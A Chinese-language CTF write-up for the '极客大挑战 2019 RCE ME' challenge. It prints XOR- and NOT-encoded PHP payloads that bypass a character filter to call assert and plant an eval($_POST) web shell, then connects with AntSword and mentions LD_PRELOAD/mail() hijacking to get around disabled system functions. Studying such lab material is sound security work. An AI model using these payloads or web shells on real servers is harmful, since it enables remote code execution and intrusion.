[极客大挑战 2019]RCE ME

简介: [极客大挑战 2019]RCE ME

用取反传了一个system(‘ls’);没有反应,看样子要另寻他法(之后看phpinfo()发现system被ban了)

取反做法:

取反绕过然后传个后门。为啥这里要用assert,搜了一下。

如下:


assert把整个字符串参数当php代码执行。php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。

这里就很奇怪了,用火狐hackbar一直说我太长了,用postman就能正常使用后门,不知道为什么。

 

 

异或做法:

Payload:

?code=${%A0%B8%BA%AB^%ff%ff%ff%ff}{%A0}();&%A0=phpinfo      

Payload:

?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=eval($_POST[%27jay17%27])

蚁剑成功连接。

但是flag里面没有东西,看了下wp,要用【 LD_preload + mail劫持so来执行系统命令】。粗略的看了一下,感觉根本看不明白,于是我就换了一种脏方法,直接用蚁剑的插件。

目录
相关文章
|
PHP 数据安全/隐私保护
[SUCTF 2019]EasyWeb
[SUCTF 2019]EasyWeb
405 0
BUUCTF LSB 1
BUUCTF LSB 1
645 0
|
11月前
|
安全 测试技术 PHP
[NPUCTF2020]ReadlezPHP1怎么回事?
NPUCTF2020的ReadlezPHP1题目展示了文件包含漏洞的利用和防御。通过对PHP代码的审计,可以发现并利用文件包含漏洞来读取敏感文件或执行恶意代码。然而,通过严格限制用户输入、使用绝对路径、禁用URL包含和避免动态包含,可以有效地防御文件包含漏洞,从而提高Web应用的安全性。在实际开发中,应时刻保持安全意识,定期进行代码审计和安全测试,以防范潜在的安全风险。
301 36
|
Linux
BUU [安洵杯 2019]easy_web
BUU [安洵杯 2019]easy_web
354 0
|
存储 安全 PHP
【文件上传绕过】——条件竞争漏洞
【文件上传绕过】——条件竞争漏洞
687 5
|
数据库
BUU [0CTF 2016]piapiapia
BUU [0CTF 2016]piapiapia
273 0
|
安全 Shell PHP
escapeshellarg() 和 escapeshellcmd()
escapeshellarg() 和 escapeshellcmd()
|
PHP
BUU [安洵杯 2019]easy_serialize_php
BUU [安洵杯 2019]easy_serialize_php
292 0
|
存储 安全 Linux
CTFHuB靶场命令执行题型过关总结
本篇博文是对自己学习rce漏洞后,因为没有进行实战练习,仅仅停留在概念上,因此做了一次靶场实战练习,来帮助自己熟悉rce漏洞的利用类型以及利用方法,写下这篇文章对此做个总结..其实关于这个练习已经过去了很久了,但我还是要那出来进行一次复习吧,对与命令执行相关的一些操作,对自己在漏洞挖掘方面能有更多的帮助,通过这次练习也对自己关于代码审计或是关于linux命令的常见命令的同意替换有了更多的了解.
|
Java Linux 数据库